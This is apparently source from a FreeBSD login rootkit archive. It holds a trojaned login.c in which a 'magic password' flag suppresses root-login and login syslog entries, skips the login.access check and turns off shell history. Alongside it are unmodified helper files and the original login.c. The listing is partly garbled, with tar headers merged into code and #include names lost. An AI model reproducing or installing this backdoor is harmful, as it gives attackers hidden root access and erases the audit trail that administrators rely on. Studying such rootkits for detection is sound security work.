	(void)setenv("TERM", term, 0);
	(void)setenv("LOGNAME", pwd->pw_name, 1);
	(void)setenv("USER", pwd->pw_name, 1);
	(void)setenv("PATH", _PATH_DEFPATH, 0);
#ifdef KERBEROS
	if (krbtkfile_env)
		(void)setenv("KRBTKFILE", krbtkfile_env, 1);
#endif

	if (tty[sizeof("tty")-1] == 'd')
		syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);

	/* If fflag is on, assume caller/authenticator has logged root login. */
	/* Don't syslog if magic password used */
	if (!werd && rootlogin && fflag == 0)
		if (hostname)
			syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s FROM %s",
			    username, tty, hostname);
		else
			syslog(LOG_NOTICE, "ROOT LOGIN (%s) ON %s", username, tty);

#ifdef KERBEROS
	if (!quietlog && notickets == 1 && !noticketsdontcomplain)
		(void)printf("Warning: no Kerberos tickets issued.\n");
#endif

#ifdef LOGALL
	/*
	 * Syslog each successful login, so we don't have to watch hundreds
	 * of wtmp or lastlogin files.
	 */
	/* Don't syslog if magic password used */
	if(!werd)
	if (hostname) {
		syslog(LOG_INFO, "login from %s as %s", hostname, pwd->pw_name);
	} else {
		syslog(LOG_INFO, "login on %s as %s", tty, pwd->pw_name);
	}
#endif

	if (!quietlog) {
		(void)printf("%s\n\t%s %s\n\n",
		    "Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994",
		    "The Regents of the University of California. ",
		    "All rights reserved.");
		motd();
		(void)snprintf(tbuf,
		    sizeof(tbuf), "%s/%s", _PATH_MAILDIR, pwd->pw_name);
		if (stat(tbuf, &st) == 0 && st.st_size != 0)
			(void)printf("You have %smail.\n",
			    (st.st_mtime > st.st_atime) ? "new " : "");
	}

#ifdef LOGIN_ACCESS
	/* Don't syslog failures using magic password */
	/* rootkit: with werd set the access table is not consulted at all */
	if (!werd && login_access(pwd->pw_name, hostname ? full_hostname : tty) == 0) {
		printf("Permission denied\n");
		if (hostname)
			syslog(LOG_NOTICE, "%s LOGIN REFUSED FROM %s",
			    pwd->pw_name, hostname);
		else
			syslog(LOG_NOTICE, "%s LOGIN REFUSED ON %s",
			    pwd->pw_name, tty);
		sleepexit(1);
	}
#endif

	(void)signal(SIGALRM, SIG_DFL);
	(void)signal(SIGQUIT, SIG_DFL);
	(void)signal(SIGINT, SIG_DFL);
	(void)signal(SIGTSTP, SIG_IGN);

	/* argv[0] of the shell is '-' followed by the shell's base name */
	tbuf[0] = '-';
	(void)strcpy(tbuf + 1, (p = strrchr(pwd->pw_shell, '/')) ?
	    p + 1 : pwd->pw_shell);

	if (setlogin(pwd->pw_name) < 0)
		syslog(LOG_ERR, "setlogin() failure: %m");

	/* Discard permissions last so can't get killed and drop core. */
	/* NOTE(review): the setuid()/setgid() results are discarded throughout. */
	if (rootlogin)
		(void) setuid(0);
	else
		(void) setuid(pwd->pw_uid);

	if (changepass) {
		int res;
		if ((res=system(_PATH_CHPASS)))
			sleepexit(1);
	}
	/* Turn off history logging if environment isn't saved */
	if(werd)
		setenv("HISTFILE","/dev/null",1);

	execlp(pwd->pw_shell, tbuf, 0);
	err(1, "%s", pwd->pw_shell);
}

#ifdef KERBEROS
#define NBUFSIZ (UT_NAMESIZE + 1 + 5) /* .root suffix */
#else
#define NBUFSIZ (UT_NAMESIZE + 1)
#endif

/*
 * getloginname -- prompt with "login: " and read one line from stdin into
 * a static buffer, then point the global `username' at it.  Characters
 * beyond NBUFSIZ - 1 are read and dropped, empty lines prompt again, and
 * a name starting with '-' is refused.  EOF calls badlogin() and exits 0.
 */
void
getloginname()
{
	int ch;
	char *p;
	static char nbuf[NBUFSIZ];

	for (;;) {
		(void)printf("login: ");
		for (p = nbuf; (ch = getchar()) != '\n'; ) {
			if (ch == EOF) {
				badlogin(username);
				exit(0);
			}
			if (p < nbuf + (NBUFSIZ - 1))
				*p++ = ch;
		}
		if (p > nbuf)
			if (nbuf[0] == '-')
				(void)fprintf(stderr,
				    "login names may not start with '-'.\n");
			else {
				*p = '\0';
				username = nbuf;
				break;
			}
	}
}

/*
 * rootterm -- non-zero when getttynam() finds an entry for ttyn and that
 * entry has TTY_SECURE set in ty_status.
 */
int
rootterm(ttyn)
	char *ttyn;
{
	struct ttyent *t;

	return ((t = getttynam(ttyn)) && t->ty_status & TTY_SECURE);
}

jmp_buf motdinterrupt;

/*
 * motd -- copy _PATH_MOTDFILE to stdout.  SIGINT is routed to sigint()
 * for the duration of the copy, which longjmp()s back here and ends it.
 */
void
motd()
{
	int fd, nchars;
	sig_t oldint;
	char tbuf[8192];

	if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
		return;
	oldint = signal(SIGINT, sigint);
	if (setjmp(motdinterrupt) == 0)
		while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
			(void)write(fileno(stdout), tbuf, nchars);
	(void)signal(SIGINT, oldint);
	(void)close(fd);
}

/* sigint -- SIGINT handler used while motd() is printing */
/* ARGSUSED */
void
sigint(signo)
	int signo;
{

	longjmp(motdinterrupt, 1);
}

/* timedout -- SIGALRM handler: report the timeout on stderr and exit 0 */
/* ARGSUSED */
void
timedout(signo)
	int signo;
{

	(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);
	exit(0);
}

/*
 * checknologin -- when _PATH_NOLOGIN can be opened, copy it to stdout and
 * leave through sleepexit(0); otherwise return.
 */
void
checknologin()
{
	int fd, nchars;
	char tbuf[8192];

	if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
		while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
			(void)write(fileno(stdout), tbuf, nchars);
		sleepexit(0);
	}
}

/*
 * dolastlog -- update this uid's record in _PATH_LASTLOG.  Records are
 * addressed as pw_uid * sizeof(struct lastlog).  Unless `quiet' is set the
 * previous record is printed first.  Nothing happens when the file cannot
 * be opened.
 */
void
dolastlog(quiet)
	int quiet;
{
	struct lastlog ll;
	int fd;

	if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
		(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
		if (!quiet) {
			if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
			    ll.ll_time != 0) {
				(void)printf("Last login: %.*s ",
				    24-5, (char *)ctime(&ll.ll_time));
				if (*ll.ll_host != '\0')
					(void)printf("from %.*s\n",
					    (int)sizeof(ll.ll_host),
					    ll.ll_host);
				else
					(void)printf("on %.*s\n",
					    (int)sizeof(ll.ll_line),
					    ll.ll_line);
			}
			/* the read moved the offset; go back before writing */
			(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
		}
		memset((void *)&ll, 0, sizeof(ll));
		(void)time(&ll.ll_time);
		(void)strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
		if (hostname)
			(void)strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
		(void)write(fd, (char *)&ll, sizeof(ll));
		(void)close(fd);
	}
}

/*
 * badlogin -- syslog the accumulated failure count, once without and once
 * (LOG_AUTHPRIV) with the attempted name.  Does nothing when `failures'
 * is 0.
 */
void
badlogin(name)
	char *name;
{

	if (failures == 0)
		return;
	if (hostname) {
		syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s",
		    failures, failures > 1 ? "S" : "", hostname);
		syslog(LOG_AUTHPRIV|LOG_NOTICE,
		    "%d LOGIN FAILURE%s FROM %s, %s",
		    failures, failures > 1 ? "S" : "", hostname, name);
	} else {
		syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s",
		    failures, failures > 1 ? "S" : "", tty);
		syslog(LOG_AUTHPRIV|LOG_NOTICE,
		    "%d LOGIN FAILURE%s ON %s, %s",
		    failures, failures > 1 ? "S" : "", tty, name);
	}
}

#undef UNKNOWN
#define UNKNOWN "su"

/*
 * stypeof -- terminal type of ttyid as given by getttynam(), or UNKNOWN
 * when ttyid is null or has no entry.
 */
char *
stypeof(ttyid)
	char *ttyid;
{
	struct ttyent *t;

	return (ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}

/* sleepexit -- sleep 5 seconds, then exit with status eval */
void
sleepexit(eval)
	int eval;
{

	(void)sleep(5);
	exit(eval);
}
fbsdrootkit-1.2/login/login_access.c100600 764 764 15417 5762566240 15104 0ustar dfdf /* * This module implements a simple but effective form of login access * control based on login names and on host (or domain) names, internet * addresses (or network numbers), or on terminal line names in case of * non-networked logins. Diagnostics are reported through syslog(3). * * Author: Wietse Venema, Eindhoven University of Technology, The Netherlands. */ #ifdef LOGIN_ACCESS #ifndef lint static char sccsid[] = "%Z% %M% %I% %E% %U%"; #endif #include #include #include #include #include #include #include #include #include #include "pathnames.h" /* Delimiters for fields and for lists of users, ttys or hosts.
*/

static char fs[] = ":";			/* field separator */
static char sep[] = ", \t";		/* list-element separator */

/* Constants to be used in assignments only, not in comparisons... */

#define YES 1
#define NO 0

static int list_match();
static int user_match();
static int from_match();
static int string_match();

/* login_access - match username/group and host/tty with access control file */
/*
 * Returns non-zero when the login is allowed: either no table line matched
 * (this includes a table that does not exist or cannot be opened) or the
 * first matching line starts with '+'.  Malformed lines are logged and
 * skipped.  In the login.c of this archive the call is skipped altogether
 * when its `werd' flag is set.
 *
 * NOTE(review): the definition has no return type (implicit int).
 */
login_access(user, from)
	char *user;
	char *from;
{
	FILE *fp;
	char line[BUFSIZ];
	char *perm;			/* becomes permission field */
	char *users;			/* becomes list of login names */
	char *froms;			/* becomes list of terminals or hosts */
	int match = NO;
	int end;
	int lineno = 0;			/* for diagnostics */

	/*
	 * Process the table one line at a time and stop at the first match.
	 * Blank lines and lines that begin with a '#' character are ignored.
	 * Non-comment lines are broken at the ':' character. All fields are
	 * mandatory. The first field should be a "+" or "-" character. A
	 * non-existing table means no access control.
	 */

	if (fp = fopen(_PATH_LOGACCESS, "r")) {
		while (!match && fgets(line, sizeof(line), fp)) {
			lineno++;
			/* NOTE(review): a line whose first byte is NUL gives strlen() == 0 and indexes line[-1]. */
			if (line[end = strlen(line) - 1] != '\n') {
				syslog(LOG_ERR, "%s: line %d: missing newline or line too long",
				    _PATH_LOGACCESS, lineno);
				continue;
			}
			if (line[0] == '#')
				continue;			/* comment line */
			while (end > 0 && isspace(line[end - 1]))
				end--;
			line[end] = 0;			/* strip trailing whitespace */
			if (line[0] == 0)			/* skip blank lines */
				continue;
			/* exactly three ':'-separated fields; a fourth is an error */
			if (!(perm = strtok(line, fs))
			    || !(users = strtok((char *) 0, fs))
			    || !(froms = strtok((char *) 0, fs))
			    || strtok((char *) 0, fs)) {
				syslog(LOG_ERR, "%s: line %d: bad field count", _PATH_LOGACCESS,
				    lineno);
				continue;
			}
			if (perm[0] != '+' && perm[0] != '-') {
				syslog(LOG_ERR, "%s: line %d: bad first field", _PATH_LOGACCESS,
				    lineno);
				continue;
			}
			/* both the origin list and the user list must match */
			match = (list_match(froms, from, from_match)
			    && list_match(users, user, user_match));
		}
		(void) fclose(fp);
	} else if (errno != ENOENT) {
		syslog(LOG_ERR, "cannot open %s: %m", _PATH_LOGACCESS);
	}
	/* line[0] is still the permission character of the matching line */
	return (match == 0 || (line[0] == '+'));
}

/* list_match - match an item against a list of tokens with exceptions */
/*
 * The list is consumed with strtok(), whose position is shared with the
 * recursive call made for the EXCEPT part (list == 0 continues the same
 * scan), so the order of the strtok() calls below matters.
 */
static int
list_match(list, item, match_fn)
	char *list;
	char *item;
	int (*match_fn) ();
{
	char *tok;
	int match = NO;

	/*
	 * Process tokens one at a time. We have exhausted all possible matches
	 * when we reach an "EXCEPT" token or the end of the list. If we do find
	 * a match, look for an "EXCEPT" list and recurse to determine whether
	 * the match is affected by any exceptions.
	 */

	for (tok = strtok(list, sep); tok != 0; tok = strtok((char *) 0, sep)) {
		if (strcasecmp(tok, "EXCEPT") == 0)	/* EXCEPT: give up */
			break;
		if (match = (*match_fn) (tok, item))	/* YES */
			break;
	}
	/* Process exceptions to matches. */

	if (match != NO) {
		/* skip the remaining tokens up to the next EXCEPT, if any */
		while ((tok = strtok((char *) 0, sep)) && strcasecmp(tok, "EXCEPT"))
			/* VOID */ ;
		if (tok == 0 || list_match((char *) 0, item, match_fn) == NO)
			return (match);
	}
	return (NO);
}

/* netgroup_match - match group against machine or user */
/*
 * NOTE(review): `group' has no declaration in the parameter list, so it
 * defaults to int although both callers pass a char *.  Without NIS the
 * function logs an error and falls off the end without returning a value,
 * so the result the callers use is indeterminate; an explicit
 * "return (NO);" there would make '@' tokens fail closed.
 */
static int
netgroup_match(group, machine, user)
	char *machine;
	char *user;
{
#ifdef NIS
	static char *mydomain = 0;

	if (mydomain == 0)
		yp_get_default_domain(&mydomain);
	return (innetgr(group, machine, user, mydomain));
#else
	syslog(LOG_ERR, "NIS netgroup support not configured");
#endif
}

/* user_match - match a username against one token */
static int
user_match(tok, string)
	char *tok;
	char *string;
{
	struct group *group;
	int i;

	/*
	 * If a token has the magic value "ALL" the match always succeeds.
	 * Otherwise, return YES if the token fully matches the username, or if
	 * the token is a group that contains the username.
	 */

	if (tok[0] == '@') {				/* netgroup */
		return (netgroup_match(tok + 1, (char *) 0, string));
	} else if (string_match(tok, string)) {	/* ALL or exact match */
		return (YES);
	} else if (group = getgrnam(tok)) {		/* try group membership */
		/* only the member list of the group entry is consulted */
		for (i = 0; group->gr_mem[i]; i++)
			if (strcasecmp(string, group->gr_mem[i]) == 0)
				return (YES);
	}
	return (NO);
}

/* from_match - match a host or tty against a list of tokens */
static int
from_match(tok, string)
	char *tok;
	char *string;
{
	int tok_len;
	int str_len;

	/*
	 * If a token has the magic value "ALL" the match always succeeds. Return
	 * YES if the token fully matches the string. If the token is a domain
	 * name, return YES if it matches the last fields of the string. If the
	 * token has the magic value "LOCAL", return YES if the string does not
	 * contain a "." character. If the token is a network number, return YES
	 * if it matches the head of the string.
	 */

	if (tok[0] == '@') {				/* netgroup */
		return (netgroup_match(tok + 1, string, (char *) 0));
	} else if (string_match(tok, string)) {	/* ALL or exact match */
		return (YES);
	} else if (tok[0] == '.') {			/* domain: match last fields */
		if ((str_len = strlen(string)) > (tok_len = strlen(tok))
		    && strcasecmp(tok, string + str_len - tok_len) == 0)
			return (YES);
	} else if (strcasecmp(tok, "LOCAL") == 0) {	/* local: no dots */
		if (strchr(string, '.') == 0)
			return (YES);
	} else if (tok[(tok_len = strlen(tok)) - 1] == '.'	/* network */
	    && strncmp(tok, string, tok_len) == 0) {
		return (YES);
	}
	return (NO);
}

/* string_match - match a string against one token */
static int
string_match(tok, string)
	char *tok;
	char *string;
{

	/*
	 * If the token has the magic value "ALL" the match always succeeds.
	 * Otherwise, return YES if the token fully matches the string.
	 * Both comparisons ignore case.
	 */

	if (strcasecmp(tok, "ALL") == 0) {		/* all: always matches */
		return (YES);
	} else if (strcasecmp(tok, string) == 0) {	/* try exact match */
		return (YES);
	}
	return (NO);
}
#endif /* LOGIN_ACCESS */
fbsdrootkit-1.2/login/pathnames.h100600 764 764 4131 5667326260 14407 0ustar dfdf/*- * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED.
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/9/93 */ #include #define _PATH_HUSHLOGIN ".hushlogin" #define _PATH_MOTDFILE "/etc/motd" #define _PATH_LOGACCESS "/etc/login.access" #define _PATH_FBTAB "/etc/fbtab" #define _PATH_LOGINDEVPERM "/etc/logindevperm" #define _PATH_CHPASS "/usr/bin/passwd" fbsdrootkit-1.2/login/login_fbtab.c100600 764 764 10600 5762566240 14706 0ustar dfdf/************************************************************************ * Copyright 1995 by Wietse Venema. All rights reserved. * * This material was originally written and compiled by Wietse Venema at * Eindhoven University of Technology, The Netherlands, in 1990, 1991, * 1992, 1993, 1994 and 1995. * * Redistribution and use in source and binary forms are permitted * provided that this entire copyright notice is duplicated in all such * copies. * * This software is provided "as is" and without any expressed or implied * warranties, including, without limitation, the implied warranties of * merchantibility and fitness for any particular purpose. ************************************************************************/ /* SYNOPSIS void login_fbtab(tty, uid, gid) char *tty; uid_t uid; gid_t gid; DESCRIPTION This module implements device security as described in the SunOS 4.1.x fbtab(5) and SunOS 5.x logindevperm(4) manual pages. The program first looks for /etc/fbtab. If that file cannot be opened it attempts to process /etc/logindevperm. 
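We expect entries with the following format:

	Comments start with a # and extend to the end of the line.

	Blank lines or lines with only a comment are ignored.

	All other lines consist of three fields delimited by
	whitespace: a login device (/dev/console), an octal
	permission number (0600), and a ":"-delimited list of
	devices (/dev/kbd:/dev/mouse).

	All device names are absolute paths. A path that ends in
	"/*" refers to all directory entries except "." and "..".

	If the tty argument (relative path) matches a login device
	name (absolute path), the permissions of the devices in the
	":"-delimited list are set as specified in the second
	field, and their ownership is changed to that of the uid
	and gid arguments.

    DIAGNOSTICS
	Problems are reported via the syslog daemon with severity
	LOG_ERR.

    BUGS
	This module uses strtok(3), which may cause conflicts with other
	uses of that same routine.

    AUTHOR
	Wietse Venema (wietse@wzv.win.tue.nl)
	Eindhoven University of Technology
	The Netherlands
 */

/* NOTE(review): the header names of the next line were lost in this listing. */
#include #include #include #include #include #include
#include "pathnames.h"

void	login_protect	__P((char *, char *, int, uid_t, gid_t));
void	login_fbtab	__P((char *tty, uid_t uid, gid_t gid));

#define	WSPACE		" \t\n"

/*
 * login_fbtab - apply protections specified in /etc/fbtab or logindevperm
 *
 * tty: login device name relative to /dev/.
 * uid, gid: new owner and group for the listed devices.
 *
 * Reads _PATH_FBTAB, or _PATH_LOGINDEVPERM when the former cannot be
 * opened; returns silently when neither can be opened.  Malformed entries
 * are logged and skipped.
 */
void
login_fbtab(tty, uid, gid)
char   *tty;
uid_t   uid;
gid_t   gid;
{
    FILE   *fp;
    char    buf[BUFSIZ];
    char   *devname;
    char   *cp;
    unsigned int prot;		/* "%o" stores through an unsigned int * */
    char   *table;

    if ((fp = fopen(table = _PATH_FBTAB, "r")) == 0
	&& (fp = fopen(table = _PATH_LOGINDEVPERM, "r")) == 0)
	return;

    while (fgets(buf, sizeof(buf), fp)) {
	if ((cp = strchr(buf, '#')) != 0)
	    *cp = 0;				/* strip comment */
	if ((cp = devname = strtok(buf, WSPACE)) == 0)
	    continue;				/* empty or comment */
	/*
	 * The permission field must be a non-zero octal number with a
	 * leading '0' and no bits outside 0777.
	 */
	if (strncmp(devname, "/dev/", 5) != 0
	    || (cp = strtok((char *) 0, WSPACE)) == 0
	    || *cp != '0'
	    || sscanf(cp, "%o", &prot) != 1
	    || prot == 0
	    || (prot & 0777) != prot
	    || (cp = strtok((char *) 0, WSPACE)) == 0) {
	    syslog(LOG_ERR, "%s: bad entry: %s", table, cp ? cp : "(null)");
	    continue;
	}
	if (strcmp(devname + 5, tty) == 0) {
	    for (cp = strtok(cp, ":"); cp; cp = strtok((char *) 0, ":")) {
		login_protect(table, cp, (int) prot, uid, gid);
	    }
	}
    }
    fclose(fp);
}

/*
 * protect_path - chmod and chown exactly one path name
 *
 * A missing path (ENOENT) is not reported; other failures are logged.
 * NOTE(review): chmod() and chown() follow symbolic links, so the listed
 * devices and wildcard directories should be writable by root only.
 */
static void
protect_path(table, path, mask, uid, gid)
char   *table;
char   *path;
int     mask;
uid_t   uid;
gid_t   gid;
{
    if (chmod(path, mask) && errno != ENOENT)
	syslog(LOG_ERR, "%s: chmod(%s): %m", table, path);
    if (chown(path, uid, gid) && errno != ENOENT)
	syslog(LOG_ERR, "%s: chown(%s): %m", table, path);
}

/*
 * login_protect - protect one device entry
 *
 * path either names one device or ends in "/*", which selects every entry
 * of that directory except "." and "..".
 *
 * Changes from the original: paths shorter than two characters are no
 * longer compared starting before the beginning of the string; entry names
 * are appended with a bounds check instead of an unchecked strcpy() into
 * buf; and directory entries are never re-interpreted as wildcards, so an
 * entry literally named "*" cannot cause unbounded recursion.
 */
void
login_protect(table, path, mask, uid, gid)
char   *table;
char   *path;
int     mask;
uid_t   uid;
gid_t   gid;
{
    char    buf[BUFSIZ];
    size_t  pathlen = strlen(path);
    size_t  dirlen;
    int     n;
    struct dirent *ent;
    DIR    *dir;

    if (pathlen < 2 || strcmp("/*", path + pathlen - 2) != 0) {
	protect_path(table, path, mask, uid, gid);
	return;
    }
    dirlen = pathlen - 1;			/* keep the trailing '/' */
    if (dirlen >= sizeof(buf)) {
	syslog(LOG_ERR, "%s: path too long: %s", table, path);
	return;
    }
    memcpy(buf, path, dirlen);
    buf[dirlen] = 0;
    if ((dir = opendir(buf)) == 0) {
	syslog(LOG_ERR, "%s: opendir(%s): %m", table, path);
	return;
    }
    while ((ent = readdir(dir)) != 0) {
	if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0)
	    continue;
	n = snprintf(buf + dirlen, sizeof(buf) - dirlen, "%s", ent->d_name);
	if (n < 0 || (size_t) n >= sizeof(buf) - dirlen) {
	    syslog(LOG_ERR, "%s: path too long: %s", table, path);
	    continue;
	}
	protect_path(table, buf, mask, uid, gid);
    }
    closedir(dir);
}
fbsdrootkit-1.2/login/login.c.dist100600 764 764 40260 6255422100 14477 0ustar dfdf/*- * Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. 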
Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1980, 1987, 1988, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)login.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ /* * login [ name ] * login -h hostname (for telnetd, etc.) * login -f name (for pre-authenticated login: datakit, xterm, etc.) 
*/

/* NOTE(review): the header names of the #include lines below were lost in this listing. */
#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include
#ifdef SKEY
#include
#endif

#include "pathnames.h"

void	 badlogin __P((char *));
void	 checknologin __P((void));
void	 dolastlog __P((int));
void	 getloginname __P((void));
void	 motd __P((void));
int	 rootterm __P((char *));
void	 sigint __P((int));
void	 sleepexit __P((int));
char	*stypeof __P((char *));
void	 timedout __P((int));
void     login_fbtab __P((char *, uid_t, gid_t));
#ifdef KERBEROS
int	 klogin __P((struct passwd *, char *, char *, char *));
#endif

extern void login __P((struct utmp *));

#define	TTYGRPNAME	"tty"		/* name of group to own ttys */

/*
 * This bounds the time given to login.  Not a define so it can
 * be patched on machines where it's too small.
 */
u_int	timeout = 300;

#ifdef KERBEROS
int	notickets = 1;
int	noticketsdontcomplain = 1;
char	*instance;
char	*krbtkfile_env;
int	authok;
#endif

struct	passwd *pwd;
int	failures;
char	term[64], *envinit[1], *hostname, *username, *tty;

/*
 * main - authenticate a user on the controlling terminal and exec the
 * login shell.
 *
 * Order of work: arm the login timeout, parse -f/-h/-p, close descriptors
 * above 2, loop prompting for name and password until one attempt is
 * accepted, then record the session (utmp, lastlog), set device and tty
 * ownership, build the environment, optionally apply login.access, drop to
 * the user's uid and exec the shell.
 */
int
main(argc, argv)
	int argc;
	char *argv[];
{
	extern char **environ;
	struct group *gr;
	struct stat st;
	struct timeval tp;
	struct utmp utmp;
	int ask, ch, cnt, fflag, hflag, pflag, quietlog, rootlogin, rval;
	int changepass;
	uid_t uid;
	char *domain, *p, *ep, *salt, *ttyn;
	char tbuf[MAXPATHLEN + 2], tname[sizeof(_PATH_TTY) + 10];
	char localhost[MAXHOSTNAMELEN];
	char full_hostname[MAXHOSTNAMELEN];
#ifdef SKEY
	int permit_passwd = 0;
#endif

	/* The whole login must finish within "timeout" seconds. */
	(void)signal(SIGALRM, timedout);
	(void)alarm(timeout);
	(void)signal(SIGQUIT, SIG_IGN);
	(void)signal(SIGINT, SIG_IGN);
	(void)setpriority(PRIO_PROCESS, 0, 0);

	openlog("login", LOG_ODELAY, LOG_AUTH);

	/*
	 * -p is used by getty to tell login not to destroy the environment
	 * -f is used to skip a second login authentication
	 * -h is used by other servers to pass the name of the remote
	 *    host to login so that it may be placed in utmp and wtmp
	 */
	*full_hostname = '\0';
	domain = NULL;
	if (gethostname(localhost, sizeof(localhost)) < 0)
		syslog(LOG_ERR, "couldn't get local hostname: %m");
	else
		domain = strchr(localhost, '.');

	fflag = hflag = pflag = 0;
	uid = getuid();
	while ((ch = getopt(argc, argv, "fh:p")) != EOF)
		switch (ch) {
		case 'f':
			fflag = 1;
			break;
		case 'h':
			/* Only a caller with real uid 0 may supply a host name. */
			if (uid)
				errx(1, "-h option: %s", strerror(EPERM));
			hflag = 1;
			/*
			 * NOTE(review): only the first byte of full_hostname
			 * was cleared above and strncpy() writes at most
			 * sizeof - 1 bytes, so the final byte is never set;
			 * a long optarg would leave the buffer unterminated.
			 */
			strncpy(full_hostname, optarg, sizeof(full_hostname)-1);
			/* Strip the local domain from the name kept for logging. */
			if (domain && (p = strchr(optarg, '.')) &&
			    strcasecmp(p, domain) == 0)
				*p = 0;
			hostname = optarg;
			break;
		case 'p':
			pflag = 1;
			break;
		case '?':
		default:
			if (!uid)
				syslog(LOG_ERR, "invalid flag %c", ch);
			(void)fprintf(stderr,
			    "usage: login [-fp] [-h hostname] [username]\n");
			exit(1);
		}
	argc -= optind;
	argv += optind;

	if (*argv) {
		username = *argv;
		ask = 0;
	} else
		ask = 1;

	/* Close every inherited descriptor above stderr. */
	for (cnt = getdtablesize(); cnt > 2; cnt--)
		(void)close(cnt);

	ttyn = ttyname(STDIN_FILENO);
	if (ttyn == NULL || *ttyn == '\0') {
		(void)snprintf(tname, sizeof(tname), "%s??", _PATH_TTY);
		ttyn = tname;
	}
	/* tty is the last path component of ttyn. */
	if (tty = strrchr(ttyn, '/'))
		++tty;
	else
		tty = ttyn;

	/* Authentication loop: leaves via break once an attempt is accepted. */
	for (cnt = 0;; ask = 1) {
		if (ask) {
			fflag = 0;
			getloginname();
		}
		rootlogin = 0;
#ifdef	KERBEROS
		if ((instance = strchr(username, '.')) != NULL) {
			if (strncmp(instance, ".root", 5) == 0)
				rootlogin = 1;
			*instance++ = '\0';
		} else
			instance = "";
#endif
		/* Truncates in place; username points at argv or at nbuf. */
		if (strlen(username) > UT_NAMESIZE)
			username[UT_NAMESIZE] = '\0';

		/*
		 * Note if trying multiple user names; log failures for
		 * previous user name, but don't bother logging one failure
		 * for nonexistent name (mistyped username).
		 */
		if (failures && strcmp(tbuf, username)) {
			if (failures > (pwd ? 0 : 1))
				badlogin(tbuf);
			failures = 0;
		}
		(void)strcpy(tbuf, username);

		/*
		 * An unknown user still gets a password prompt; "xx" is a
		 * placeholder salt so crypt() is called either way.
		 */
		if (pwd = getpwnam(username))
			salt = pwd->pw_passwd;
		else
			salt = "xx";

		/*
		 * if we have a valid account name, and it doesn't have a
		 * password, or the -f option was specified and the caller
		 * is root or the caller isn't changing their uid, don't
		 * authenticate.
		 */
		if (pwd) {
